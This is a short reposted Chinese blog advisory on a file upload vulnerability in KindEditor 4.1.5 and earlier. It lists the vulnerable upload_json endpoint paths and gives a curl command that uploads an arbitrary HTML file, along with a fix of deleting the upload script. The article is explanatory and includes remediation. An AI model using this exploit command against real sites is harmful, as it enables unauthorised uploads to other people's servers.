kindeditor<=4.1.5 文件上传漏洞利用

本文转载自查看原文 2019-03-22 02:48 2832 漏洞档案/ 渗透测试/ 网络安全/ 漏洞利用

kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

　　漏洞存影响版本：小于等于4.1.5的kindeditor 编辑器

　　漏洞影响：上传任意. txt 和. html 文件

　　漏洞存在动态脚本语言： php/asp/jsp/asp.net

　　漏洞存在的证明文件：upload_json.* 具体路径如下：

　　/kindeditor/asp/upload_json.asp

　　/kindeditor/asp.net/upload_json.ashx

　　/kindeditor/jsp/upload_json.jsp

　　/kindeditor/php/upload_json.php

利用方式：

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html为想要上传的文件

在返回中得到上传后的路径，然后访问

修复

删除upload_json.asp即可。

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 kindeditor<=4.1.5上传漏洞复现文件上传漏洞与利用文件上传漏洞的介绍及利用 SpringBoot之KindEditor文件上传 vulhub Nginx文件解析漏洞复现——利用文件上传漏洞上传恶意后门 KindEditor文件上传成功前端显示上传失败文件包含漏洞利用 EasyAdmin上传文件漏洞 WEB漏洞——文件上传文件上传漏洞